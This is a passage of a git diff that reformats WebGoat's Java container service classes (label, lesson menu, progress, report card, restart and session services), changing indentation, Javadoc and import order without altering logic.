-        log.debug("Checking label debugging, it is {}", labelDebugger.isEnabled());
-        Map<String, Object> result = createResponse(labelDebugger.isEnabled());
-        return new ResponseEntity<>(result, HttpStatus.OK);
-    }
+  /**
+   * Checks if debugging of labels is enabled or disabled
+   *
+   * @return a {@link org.springframework.http.ResponseEntity} object.
+   */
+  @RequestMapping(path = URL_DEBUG_LABELS_MVC, produces = MediaType.APPLICATION_JSON_VALUE)
+  public @ResponseBody ResponseEntity<Map<String, Object>> checkDebuggingStatus() {
+    log.debug("Checking label debugging, it is {}", labelDebugger.isEnabled());
+    Map<String, Object> result = createResponse(labelDebugger.isEnabled());
+    return new ResponseEntity<>(result, HttpStatus.OK);
+  }
 
-    /**
-     * Sets the enabled flag on the label debugger to the given parameter
-     *
-     * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
-     * @return a {@link org.springframework.http.ResponseEntity} object.
-     */
-    @RequestMapping(value = URL_DEBUG_LABELS_MVC, produces = MediaType.APPLICATION_JSON_VALUE, params = KEY_ENABLED)
-    public @ResponseBody
-    ResponseEntity<Map<String, Object>> setDebuggingStatus(@RequestParam("enabled") Boolean enabled) {
-        log.debug("Setting label debugging to {} ", labelDebugger.isEnabled());
-        Map<String, Object> result = createResponse(enabled);
-        labelDebugger.setEnabled(enabled);
-        return new ResponseEntity<>(result, HttpStatus.OK);
-    }
+  /**
+   * Sets the enabled flag on the label debugger to the given parameter
+   *
+   * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
+   * @return a {@link org.springframework.http.ResponseEntity} object.
+   */
+  @RequestMapping(
+      value = URL_DEBUG_LABELS_MVC,
+      produces = MediaType.APPLICATION_JSON_VALUE,
+      params = KEY_ENABLED)
+  public @ResponseBody ResponseEntity<Map<String, Object>> setDebuggingStatus(
+      @RequestParam("enabled") Boolean enabled) {
+    log.debug("Setting label debugging to {} ", labelDebugger.isEnabled());
+    Map<String, Object> result = createResponse(enabled);
+    labelDebugger.setEnabled(enabled);
+    return new ResponseEntity<>(result, HttpStatus.OK);
+  }
 
-    /**
-     * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
-     * @return a {@link java.util.Map} object.
-     */
-    private Map<String, Object> createResponse(Boolean enabled) {
-        return Map.of(KEY_SUCCESS, Boolean.TRUE, KEY_ENABLED, enabled);
-    }
+  /**
+   * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
+   * @return a {@link java.util.Map} object.
+   */
+  private Map<String, Object> createResponse(Boolean enabled) {
+    return Map.of(KEY_SUCCESS, Boolean.TRUE, KEY_ENABLED, enabled);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/LabelService.java b/src/main/java/org/owasp/webgoat/container/service/LabelService.java
index 5a6d06b95..1a8f96720 100644
--- a/src/main/java/org/owasp/webgoat/container/service/LabelService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LabelService.java
@@ -1,34 +1,33 @@
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
  * for free software projects.
  */
-
 package org.owasp.webgoat.container.service;
 
+import java.util.Properties;
 import lombok.RequiredArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.i18n.Messages;
@@ -40,11 +39,8 @@ import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.Properties;
-
-
 /**
- * <p>LabelService class.</p>
+ * LabelService class.
  *
  * @author zupzup
  */
@@ -53,19 +49,19 @@ import java.util.Properties;
 @RequiredArgsConstructor
 public class LabelService {
 
-    public static final String URL_LABELS_MVC = "/service/labels.mvc";
-    private final Messages messages;
-    private final PluginMessages pluginMessages;
+  public static final String URL_LABELS_MVC = "/service/labels.mvc";
+  private final Messages messages;
+  private final PluginMessages pluginMessages;
 
-    /**
-     * @return a map of all the labels
-     */
-    @GetMapping(path = URL_LABELS_MVC, produces = MediaType.APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public ResponseEntity<Properties> fetchLabels() {
-        var allProperties = new Properties();
-        allProperties.putAll(messages.getMessages());
-        allProperties.putAll(pluginMessages.getMessages());
-        return new ResponseEntity<>(allProperties, HttpStatus.OK);
-    }
+  /**
+   * @return a map of all the labels
+   */
+  @GetMapping(path = URL_LABELS_MVC, produces = MediaType.APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public ResponseEntity<Properties> fetchLabels() {
+    var allProperties = new Properties();
+    allProperties.putAll(messages.getMessages());
+    allProperties.putAll(pluginMessages.getMessages());
+    return new ResponseEntity<>(allProperties, HttpStatus.OK);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/LessonInfoService.java b/src/main/java/org/owasp/webgoat/container/service/LessonInfoService.java
index ccbf77f40..fcface416 100644
--- a/src/main/java/org/owasp/webgoat/container/service/LessonInfoService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonInfoService.java
@@ -8,9 +8,8 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
 /**
- * <p>LessonInfoService class.</p>
+ * LessonInfoService class.
  *
  * @author dm
  * @version $Id: $Id
@@ -19,18 +18,16 @@ import org.springframework.web.bind.annotation.RestController;
 @AllArgsConstructor
 public class LessonInfoService {
 
-    private final WebSession webSession;
-
-    /**
-     * <p>getLessonInfo.</p>
-     *
-     * @return a {@link LessonInfoModel} object.
-     */
-    @RequestMapping(path = "/service/lessoninfo.mvc", produces = "application/json")
-    public @ResponseBody
-    LessonInfoModel getLessonInfo() {
-        Lesson lesson = webSession.getCurrentLesson();
-        return new LessonInfoModel(lesson.getTitle(), false, false, false);
-    }
+  private final WebSession webSession;
 
+  /**
+   * getLessonInfo.
+   *
+   * @return a {@link LessonInfoModel} object.
+   */
+  @RequestMapping(path = "/service/lessoninfo.mvc", produces = "application/json")
+  public @ResponseBody LessonInfoModel getLessonInfo() {
+    Lesson lesson = webSession.getCurrentLesson();
+    return new LessonInfoModel(lesson.getTitle(), false, false, false);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/LessonMenuService.java b/src/main/java/org/owasp/webgoat/container/service/LessonMenuService.java
index 6fe6d32e3..961e10d47 100644
--- a/src/main/java/org/owasp/webgoat/container/service/LessonMenuService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonMenuService.java
@@ -1,34 +1,36 @@
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at
- * https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  */
-
 package org.owasp.webgoat.container.service;
 
+import java.util.ArrayList;
+import java.util.Comparator;
+import java.util.List;
+import java.util.Map;
 import lombok.AllArgsConstructor;
 import org.owasp.webgoat.container.lessons.Assignment;
 import org.owasp.webgoat.container.lessons.Category;
@@ -45,13 +47,8 @@ import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.util.ArrayList;
-import java.util.Comparator;
-import java.util.List;
-import java.util.Map;
-
 /**
- * <p>LessonMenuService class.</p>
+ * LessonMenuService class.
  *
  * @author rlawson
  * @version $Id: $Id
@@ -60,72 +57,68 @@ import java.util.Map;
 @AllArgsConstructor
 public class LessonMenuService {
 
-    public static final String URL_LESSONMENU_MVC = "/service/lessonmenu.mvc";
-    private final Course course;
-    private final WebSession webSession;
-    private UserTrackerRepository userTrackerRepository;
+  public static final String URL_LESSONMENU_MVC = "/service/lessonmenu.mvc";
+  private final Course course;
+  private final WebSession webSession;
+  private UserTrackerRepository userTrackerRepository;
 
-    @Value("#{'${exclude.categories}'.split(',')}")
-    private List<String> excludeCategories;
+  @Value("#{'${exclude.categories}'.split(',')}")
+  private List<String> excludeCategories;
 
-    @Value("#{'${exclude.lessons}'.split(',')}")
-    private List<String> excludeLessons;
+  @Value("#{'${exclude.lessons}'.split(',')}")
+  private List<String> excludeLessons;
 
-    /**
-     * Returns the lesson menu which is used to build the left nav
-     *
-     * @return a {@link java.util.List} object.
-     */
-    @RequestMapping(path = URL_LESSONMENU_MVC, produces = "application/json")
-    public
-    @ResponseBody
-    List<LessonMenuItem> showLeftNav() {
-        List<LessonMenuItem> menu = new ArrayList<>();
-        List<Category> categories = course.getCategories();
-        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
+  /**
+   * Returns the lesson menu which is used to build the left nav
+   *
+   * @return a {@link java.util.List} object.
+   */
+  @RequestMapping(path = URL_LESSONMENU_MVC, produces = "application/json")
+  public @ResponseBody List<LessonMenuItem> showLeftNav() {
+    List<LessonMenuItem> menu = new ArrayList<>();
+    List<Category> categories = course.getCategories();
+    UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
 
-        for (Category category : categories) {
-            if (excludeCategories.contains(category.name())) {
-                continue;
-            }
-            LessonMenuItem categoryItem = new LessonMenuItem();
-            categoryItem.setName(category.getName());
-            categoryItem.setType(LessonMenuItemType.CATEGORY);
-            // check for any lessons for this category
-            List<Lesson> lessons = course.getLessons(category);
-            lessons = lessons.stream().sorted(Comparator.comparing(Lesson::getTitle)).toList();
-            for (Lesson lesson : lessons) {
-                if (excludeLessons.contains(lesson.getName())) {
-                    continue;
-                }
-                LessonMenuItem lessonItem = new LessonMenuItem();
-                lessonItem.setName(lesson.getTitle());
-                lessonItem.setLink(lesson.getLink());
-                lessonItem.setType(LessonMenuItemType.LESSON);
-                LessonTracker lessonTracker = userTracker.getLessonTracker(lesson);
-                boolean lessonSolved = lessonCompleted(lessonTracker.getLessonOverview(), lesson);
-                lessonItem.setComplete(lessonSolved);
-                categoryItem.addChild(lessonItem);
-            }
-            categoryItem.getChildren().sort((o1, o2) -> o1.getRanking() - o2.getRanking());
-            menu.add(categoryItem);
+    for (Category category : categories) {
+      if (excludeCategories.contains(category.name())) {
+        continue;
+      }
+      LessonMenuItem categoryItem = new LessonMenuItem();
+      categoryItem.setName(category.getName());
+      categoryItem.setType(LessonMenuItemType.CATEGORY);
+      // check for any lessons for this category
+      List<Lesson> lessons = course.getLessons(category);
+      lessons = lessons.stream().sorted(Comparator.comparing(Lesson::getTitle)).toList();
+      for (Lesson lesson : lessons) {
+        if (excludeLessons.contains(lesson.getName())) {
+          continue;
         }
-        return menu;
-
+        LessonMenuItem lessonItem = new LessonMenuItem();
+        lessonItem.setName(lesson.getTitle());
+        lessonItem.setLink(lesson.getLink());
+        lessonItem.setType(LessonMenuItemType.LESSON);
+        LessonTracker lessonTracker = userTracker.getLessonTracker(lesson);
+        boolean lessonSolved = lessonCompleted(lessonTracker.getLessonOverview(), lesson);
+        lessonItem.setComplete(lessonSolved);
+        categoryItem.addChild(lessonItem);
+      }
+      categoryItem.getChildren().sort((o1, o2) -> o1.getRanking() - o2.getRanking());
+      menu.add(categoryItem);
     }
+    return menu;
+  }
 
-    private boolean lessonCompleted(Map<Assignment, Boolean> map, Lesson currentLesson) {
-        boolean result = true;
-        for (Map.Entry<Assignment, Boolean> entry : map.entrySet()) {
-            Assignment storedAssignment = entry.getKey();
-            for (Assignment lessonAssignment : currentLesson.getAssignments()) {
-                if (lessonAssignment.getName().equals(storedAssignment.getName())) {
-                    result = result && entry.getValue();
-                    break;
-                }
-            }
-
+  private boolean lessonCompleted(Map<Assignment, Boolean> map, Lesson currentLesson) {
+    boolean result = true;
+    for (Map.Entry<Assignment, Boolean> entry : map.entrySet()) {
+      Assignment storedAssignment = entry.getKey();
+      for (Assignment lessonAssignment : currentLesson.getAssignments()) {
+        if (lessonAssignment.getName().equals(storedAssignment.getName())) {
+          result = result && entry.getValue();
+          break;
         }
-        return result;
+      }
     }
+    return result;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java b/src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java
index 73deb7b60..23fc38da5 100644
--- a/src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java
@@ -1,5 +1,6 @@
 package org.owasp.webgoat.container.service;
 
+import java.util.List;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.RequiredArgsConstructor;
@@ -10,11 +11,8 @@ import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.util.List;
-
-
 /**
- * <p>LessonProgressService class.</p>
+ * LessonProgressService class.
  *
  * @author webgoat
  */
@@ -22,38 +20,38 @@ import java.util.List;
 @RequiredArgsConstructor
 public class LessonProgressService {
 
-    private final UserTrackerRepository userTrackerRepository;
-    private final WebSession webSession;
+  private final UserTrackerRepository userTrackerRepository;
+  private final WebSession webSession;
 
-    /**
-     * Endpoint for fetching the complete lesson overview which informs the user about whether all the assignments are solved.
-     * Used as the last page of the lesson to generate a lesson overview.
-     *
-     * @return list of assignments
-     */
-    @RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
-    @ResponseBody
-    public List<LessonOverview> lessonOverview() {
-        var userTracker = userTrackerRepository.findByUser(webSession.getUserName());
-        var currentLesson = webSession.getCurrentLesson();
+  /**
+   * Endpoint for fetching the complete lesson overview which informs the user about whether all the
+   * assignments are solved. Used as the last page of the lesson to generate a lesson overview.
+   *
+   * @return list of assignments
+   */
+  @RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
+  @ResponseBody
+  public List<LessonOverview> lessonOverview() {
+    var userTracker = userTrackerRepository.findByUser(webSession.getUserName());
+    var currentLesson = webSession.getCurrentLesson();
 
-        if (currentLesson != null) {
-            var lessonTracker = userTracker.getLessonTracker(currentLesson);
-            return lessonTracker.getLessonOverview().entrySet().stream()
-                    .map(entry -> new LessonOverview(entry.getKey(), entry.getValue()))
-                    .toList();
-        }
-        return List.of();
+    if (currentLesson != null) {
+      var lessonTracker = userTracker.getLessonTracker(currentLesson);
+      return lessonTracker.getLessonOverview().entrySet().stream()
+          .map(entry -> new LessonOverview(entry.getKey(), entry.getValue()))
+          .toList();
     }
+    return List.of();
+  }
 
-    @AllArgsConstructor
-    @Getter
-    //Jackson does not really like returning a map of <Assignment, Boolean> directly, see http://stackoverflow.com/questions/11628698/can-we-make-object-as-key-in-map-when-using-json
-    //so creating intermediate object is the easiest solution
-    private static class LessonOverview {
+  @AllArgsConstructor
+  @Getter
+  // Jackson does not really like returning a map of <Assignment, Boolean> directly, see
+  // http://stackoverflow.com/questions/11628698/can-we-make-object-as-key-in-map-when-using-json
+  // so creating intermediate object is the easiest solution
+  private static class LessonOverview {
 
-        private Assignment assignment;
-        private Boolean solved;
-
-    }
+    private Assignment assignment;
+    private Boolean solved;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/LessonTitleService.java b/src/main/java/org/owasp/webgoat/container/service/LessonTitleService.java
index 99006fa0a..d1c902880 100644
--- a/src/main/java/org/owasp/webgoat/container/service/LessonTitleService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonTitleService.java
@@ -6,9 +6,8 @@ import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-
 /**
- * <p>LessonTitleService class.</p>
+ * LessonTitleService class.
  *
  * @author dm
  * @version $Id: $Id
@@ -16,23 +15,20 @@ import org.springframework.web.bind.annotation.ResponseBody;
 @Controller
 public class LessonTitleService {
 
-    private final WebSession webSession;
+  private final WebSession webSession;
 
-    public LessonTitleService(final WebSession webSession) {
-        this.webSession = webSession;
-    }
-
-    /**
-     * Returns the title for the current attack
-     *
-     * @return a {@link java.lang.String} object.
-     */
-    @RequestMapping(path = "/service/lessontitle.mvc", produces = "application/html")
-    public
-    @ResponseBody
-    String showPlan() {
-        Lesson lesson = webSession.getCurrentLesson();
-        return lesson != null ? lesson.getTitle() : "";
-    }
+  public LessonTitleService(final WebSession webSession) {
+    this.webSession = webSession;
+  }
 
+  /**
+   * Returns the title for the current attack
+   *
+   * @return a {@link java.lang.String} object.
+   */
+  @RequestMapping(path = "/service/lessontitle.mvc", produces = "application/html")
+  public @ResponseBody String showPlan() {
+    Lesson lesson = webSession.getCurrentLesson();
+    return lesson != null ? lesson.getTitle() : "";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/ReportCardService.java b/src/main/java/org/owasp/webgoat/container/service/ReportCardService.java
index 14c6c2fa9..a01bce5c1 100644
--- a/src/main/java/org/owasp/webgoat/container/service/ReportCardService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/ReportCardService.java
@@ -1,34 +1,34 @@
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at
- * https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  */
-
 package org.owasp.webgoat.container.service;
 
+import java.util.ArrayList;
+import java.util.List;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.Setter;
@@ -43,11 +43,8 @@ import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.util.ArrayList;
-import java.util.List;
-
 /**
- * <p>ReportCardService</p>
+ * ReportCardService
  *
  * @author nbaars
  * @version $Id: $Id
@@ -56,52 +53,53 @@ import java.util.List;
 @AllArgsConstructor
 public class ReportCardService {
 
-    private final WebSession webSession;
-    private final UserTrackerRepository userTrackerRepository;
-    private final Course course;
-    private final PluginMessages pluginMessages;
+  private final WebSession webSession;
+  private final UserTrackerRepository userTrackerRepository;
+  private final Course course;
+  private final PluginMessages pluginMessages;
 
-    /**
-     * Endpoint which generates the report card for the current use to show the stats on the solved lessons
-     */
-    @GetMapping(path = "/service/reportcard.mvc", produces = "application/json")
-    @ResponseBody
-    public ReportCard reportCard() {
-        final ReportCard reportCard = new ReportCard();
-        reportCard.setTotalNumberOfLessons(course.getTotalOfLessons());
-        reportCard.setTotalNumberOfAssignments(course.getTotalOfAssignments());
+  /**
+   * Endpoint which generates the report card for the current use to show the stats on the solved
+   * lessons
+   */
+  @GetMapping(path = "/service/reportcard.mvc", produces = "application/json")
+  @ResponseBody
+  public ReportCard reportCard() {
+    final ReportCard reportCard = new ReportCard();
+    reportCard.setTotalNumberOfLessons(course.getTotalOfLessons());
+    reportCard.setTotalNumberOfAssignments(course.getTotalOfAssignments());
 
-        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
-        reportCard.setNumberOfAssignmentsSolved(userTracker.numberOfAssignmentsSolved());
-        reportCard.setNumberOfLessonsSolved(userTracker.numberOfLessonsSolved());
-        for (Lesson lesson : course.getLessons()) {
-            LessonTracker lessonTracker = userTracker.getLessonTracker(lesson);
-            final LessonStatistics lessonStatistics = new LessonStatistics();
-            lessonStatistics.setName(pluginMessages.getMessage(lesson.getTitle()));
-            lessonStatistics.setNumberOfAttempts(lessonTracker.getNumberOfAttempts());
-            lessonStatistics.setSolved(lessonTracker.isLessonSolved());
-            reportCard.lessonStatistics.add(lessonStatistics);
-        }
-        return reportCard;
+    UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
+    reportCard.setNumberOfAssignmentsSolved(userTracker.numberOfAssignmentsSolved());
+    reportCard.setNumberOfLessonsSolved(userTracker.numberOfLessonsSolved());
+    for (Lesson lesson : course.getLessons()) {
+      LessonTracker lessonTracker = userTracker.getLessonTracker(lesson);
+      final LessonStatistics lessonStatistics = new LessonStatistics();
+      lessonStatistics.setName(pluginMessages.getMessage(lesson.getTitle()));
+      lessonStatistics.setNumberOfAttempts(lessonTracker.getNumberOfAttempts());
+      lessonStatistics.setSolved(lessonTracker.isLessonSolved());
+      reportCard.lessonStatistics.add(lessonStatistics);
     }
+    return reportCard;
+  }
 
-    @Getter
-    @Setter
-    private final class ReportCard {
+  @Getter
+  @Setter
+  private final class ReportCard {
 
-        private int totalNumberOfLessons;
-        private int totalNumberOfAssignments;
-        private int solvedLessons;
-        private int numberOfAssignmentsSolved;
-        private int numberOfLessonsSolved;
-        private List<LessonStatistics> lessonStatistics =  new ArrayList<>();
-    }
+    private int totalNumberOfLessons;
+    private int totalNumberOfAssignments;
+    private int solvedLessons;
+    private int numberOfAssignmentsSolved;
+    private int numberOfLessonsSolved;
+    private List<LessonStatistics> lessonStatistics = new ArrayList<>();
+  }
 
-    @Setter
-    @Getter
-    private final class LessonStatistics {
-        private String name;
-        private boolean solved;
-        private int numberOfAttempts;
-    }
+  @Setter
+  @Getter
+  private final class LessonStatistics {
+    private String name;
+    private boolean solved;
+    private int numberOfAttempts;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/RestartLessonService.java b/src/main/java/org/owasp/webgoat/container/service/RestartLessonService.java
index d14b4e11c..2f0450d9e 100644
--- a/src/main/java/org/owasp/webgoat/container/service/RestartLessonService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/RestartLessonService.java
@@ -24,6 +24,8 @@
 
 package org.owasp.webgoat.container.service;
 
+import java.util.List;
+import java.util.function.Function;
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.flywaydb.core.Flyway;
@@ -37,33 +39,30 @@ import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseStatus;
 
-import java.util.List;
-import java.util.function.Function;
-
 @Controller
 @AllArgsConstructor
 @Slf4j
 public class RestartLessonService {
 
-    private final WebSession webSession;
-    private final UserTrackerRepository userTrackerRepository;
-    private final Function<String, Flyway> flywayLessons;
-    private final List<Initializeable> lessonsToInitialize;
+  private final WebSession webSession;
+  private final UserTrackerRepository userTrackerRepository;
+  private final Function<String, Flyway> flywayLessons;
+  private final List<Initializeable> lessonsToInitialize;
 
-    @RequestMapping(path = "/service/restartlesson.mvc", produces = "text/text")
-    @ResponseStatus(value = HttpStatus.OK)
-    public void restartLesson() {
-        Lesson al = webSession.getCurrentLesson();
-        log.debug("Restarting lesson: " + al);
+  @RequestMapping(path = "/service/restartlesson.mvc", produces = "text/text")
+  @ResponseStatus(value = HttpStatus.OK)
+  public void restartLesson() {
+    Lesson al = webSession.getCurrentLesson();
+    log.debug("Restarting lesson: " + al);
 
-        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
-        userTracker.reset(al);
-        userTrackerRepository.save(userTracker);
+    UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
+    userTracker.reset(al);
+    userTrackerRepository.save(userTracker);
 
-        var flyway = flywayLessons.apply(webSession.getUserName());
-        flyway.clean();
-        flyway.migrate();
+    var flyway = flywayLessons.apply(webSession.getUserName());
+    flyway.clean();
+    flyway.migrate();
 
-        lessonsToInitialize.forEach(i -> i.initialize(webSession.getUser()));
-    }
+    lessonsToInitialize.forEach(i -> i.initialize(webSession.getUser()));
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/SessionService.java b/src/main/java/org/owasp/webgoat/container/service/SessionService.java
index 6352237e4..b1a14d2c2 100644
--- a/src/main/java/org/owasp/webgoat/container/service/SessionService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/SessionService.java
@@ -17,17 +17,17 @@ import org.springframework.web.bind.annotation.ResponseBody;
 @RequiredArgsConstructor
 public class SessionService {
 
-    private final WebSession webSession;
-    private final RestartLessonService restartLessonService;
-    private final Messages messages;
+  private final WebSession webSession;
+  private final RestartLessonService restartLessonService;
+  private final Messages messages;
 
-    @RequestMapping(path = "/service/enable-security.mvc", produces = "application/json")
-    @ResponseBody
-    public String applySecurity() {
-        webSession.toggleSecurity();
-        restartLessonService.restartLesson();
+  @RequestMapping(path = "/service/enable-security.mvc", produces = "application/json")
+  @ResponseBody
+  public String applySecurity() {
+    webSession.toggleSecurity();
+    restartLessonService.restartLesson();
 
-        var msg = webSession.isSecurityEnabled() ? "security.enabled" : "security.disabled";
-        return messages.getMessage(msg);
-    }
+    var msg = webSession.isSecurityEnabled() ? "security.enabled" : "security.disabled";
+    return messages.getMessage(msg);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/session/Course.java b/src/main/java/org/owasp/webgoat/container/session/Course.java
index 349150c4e..225af4053 100644
--- a/src/main/java/org/owasp/webgoat/container/session/Course.java
+++ b/src/main/java/org/owasp/webgoat/container/session/Course.java
@@ -1,36 +1,36 @@
 package org.owasp.webgoat.container.session;
 
+import java.util.List;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
 
-import java.util.List;
-
 /**
  * ************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
